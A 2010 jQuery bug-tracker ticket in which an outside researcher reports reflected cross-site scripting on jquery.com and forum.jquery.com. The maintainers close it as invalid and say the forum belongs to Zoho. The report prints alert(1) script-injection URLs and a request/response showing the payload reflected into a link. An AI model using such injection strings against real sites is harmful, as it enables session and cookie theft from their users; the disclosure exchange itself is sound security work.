Side navigation
#7509 closed bug (invalid)
Opened November 14, 2010 05:21PM UTC
Closed December 01, 2010 11:34PM UTC
Last modified March 13, 2012 05:25PM UTC
Report of XSS in jquery.com
| Reported by: | h02332@gmail.com | Owned by: | jdsharp |
|---|---|---|---|
| Priority: | undecided | Milestone: | 1.5 |
| Component: | web | Version: | 1.4.4 |
| Keywords: | Cc: | ||
| Blocked by: | Blocking: |
Description
Report of XSS in forum.query.com and jquery.com, etc.
We tried to make a few private contacts but received no response. We've fingerprinted Cross Site Scripting and provide a Forum Poc:
http://forum.jquery.com/?d53cd"><script>alert(1)</script>f59c917a6e7=1
Also provided is a jquery.com PoC:
http://jquery.com/?d53cd"><script>alert(1)</script>f59c917a6e7=1
As noted, this can be reproduced en mass.
We'd appreciate someone from the jquery team sending us email to h02332 \\\\@\\\\/ gmail \\\\.//\\ com as we have a number of bugs to provide privately.
Thank You.
Hoyt LLC Research
Attachments (0)
Change History (12)
Changed November 14, 2010 07:49PM UTC by comment:1
| component: | unfiled → web |
|---|---|
| owner: | → jdsharp |
Changed November 15, 2010 12:29AM UTC by comment:9
| status: | new → assigned |
|---|
Changed December 01, 2010 11:34PM UTC by comment:10
| resolution: | → invalid |
|---|---|
| status: | assigned → closed |
None of these reports are valid. Just because IE says it’s “changed the page” to prevent XSS doesn’t mean there is actually a vulnerability on the page, and in these cases, there was indeed no vulnerability.
Changed December 02, 2010 03:03AM UTC by comment:11
Hello-
This is the first update we've seen on this ticket.. we don't publish live PoC's for frameworks.. however, some additional info can help..
Request
GET /?d53cd"><script>alert(1)</script>f59c917a6e7=1 HTTP/1.1
Host: forum.jquery.com
Response
HTTP/1.1 200 OK
Set-Cookie: zdccn=ba2a8341-6714-4548-ba38-cb44b081796e; Path=/
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/?d53cd"><script>alert(1)</script>f59c917a6e7=1&forumGroupUrl=jquery">
...[SNIP]...
This is JqueryUI ... cookies too.. http://cloudscan.blogspot.com/2010/11/jqueryuicom-cross-site-scripting.html
From the looks of this ticket, it doesn't look like more info is requested, so we'll publish the data. Sorry you didn't find the info useful.
Changed December 03, 2010 03:18AM UTC by comment:12
forum.jquery.com is not our property. We have no control over the code. You should talk to Zoho about that.